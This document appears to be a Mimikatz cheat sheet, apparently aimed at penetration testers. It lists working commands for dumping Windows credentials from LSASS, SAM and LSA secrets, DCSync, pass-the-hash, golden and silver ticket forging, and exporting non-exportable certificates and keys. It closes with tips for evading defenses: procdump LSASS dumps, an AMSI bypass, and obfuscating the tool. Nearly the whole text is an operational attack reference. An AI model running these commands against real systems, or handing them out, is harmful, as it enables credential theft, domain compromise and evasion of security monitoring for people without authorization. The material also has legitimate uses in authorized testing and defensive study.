mimikatz.exe "command1" "command2" "exit"
Always start with:
privilege::debug
| Command | Purpose |
privilege::debug | Enable debug privileges (required) |
sekurlsa::logonpasswords | Dump all credentials from LSASS |
sekurlsa::credman | Dump Credential Manager secrets |
sekurlsa::tickets /export | Export Kerberos tickets |
lsadump::sam | Dump local SAM database |
lsadump::secrets | Dump LSA secrets |
lsadump::cache | Dump cached domain credentials |
lsadump::dcsync /user:Administrator | DCSync attack |
| Module | Purpose |
sekurlsa | Extract credentials from LSASS memory |
lsadump | Dump LSA secrets, SAM, DCSync |
kerberos | Kerberos ticket operations |
vault | Windows Vault/Credential Manager |
dpapi | DPAPI decryption |
crypto | Certificate and key operations |
token | Token manipulation |
| Command | Description |
sekurlsa::logonpasswords | Dump all logon passwords |
sekurlsa::credman | Dump Credential Manager |
sekurlsa::dpapi | Dump DPAPI masterkeys |
sekurlsa::tickets | List Kerberos tickets |
sekurlsa::tickets /export | Export tickets to .kirbi files |
sekurlsa::wdigest | Dump WDigest credentials |
sekurlsa::ekeys | Dump Kerberos encryption keys |
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd.exe
sekurlsa::pth /user:<user> /rc4:<hash> /domain:<domain> /run:cmd.exe
sekurlsa::pth /user:<user> /domain:<domain> /aes256:<aes256_hash> /run:cmd.exe
sekurlsa::ekeys
| Command | Description |
crypto::capi | Patch CryptoAPI to make non-exportable keys exportable |
crypto::cng | Patch CNG to make non-exportable keys exportable |
crypto::certificates /export | Export all user certificates |
crypto::certificates /systemstore:local_machine /export | Export machine certificates |
crypto::certificates /export
crypto::certificates /systemstore:local_machine /export
crypto::capi
crypto::cng
| Command | Description |
lsadump::sam | Dump SAM database (local accounts) |
lsadump::secrets | Dump LSA secrets |
lsadump::cache | Dump cached domain creds (DCC2) |
lsadump::trust | Dump trust relationships |
lsadump::dcsync /domain:domain.local /user:Administrator
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /all /csv
lsadump::sam /sam:sam.hive /system:system.hive
lsadump::secrets /system:system.hive /security:security.hive
kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ptt
kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_sid> /target:<server> /service:<svc> /rc4:<svc_hash> /ptt
| Command | Description |
kerberos::list | List current tickets |
kerberos::ptt <file.kirbi> | Pass-the-Ticket |
kerberos::purge | Purge all tickets |
kerberos::tgt | Get current TGT |
| Command | Description |
vault::list | List vault credentials |
vault::cred | Dump vault credentials |
dpapi::cred /in:<file> | Decrypt credential file |
dpapi::blob /in:<file> /masterkey:<key> | Decrypt DPAPI blob |
dpapi::masterkey /in:<file> /rpc | Get masterkey via RPC |
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:domain.local /user:krbtgt" "exit"
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"
mimikatz.exe "privilege::debug" "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt" "exit"
mimikatz.exe "privilege::debug" "crypto::capi" "crypto::certificates /export" "exit"
mimikatz.exe "privilege::debug" "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"
| Error | Solution |
ERROR kuhl_m_sekurlsa_acquireLSA | Run as Administrator |
Privilege '20' KO | Need local admin rights |
Handle on memory | LSASS protected, try offline dump |
- Dump LSASS with
procdump -ma lsass.exe lsass.dmp and analyze offline
- Use
pypykatz for cross-platform offline analysis
- Use PowerShell
Invoke-Mimikatz with AMSI bypass
- Obfuscate or recompile from source
procdump.exe -ma lsass.exe lsass.dmp
pypykatz lsa minidump lsass.dmp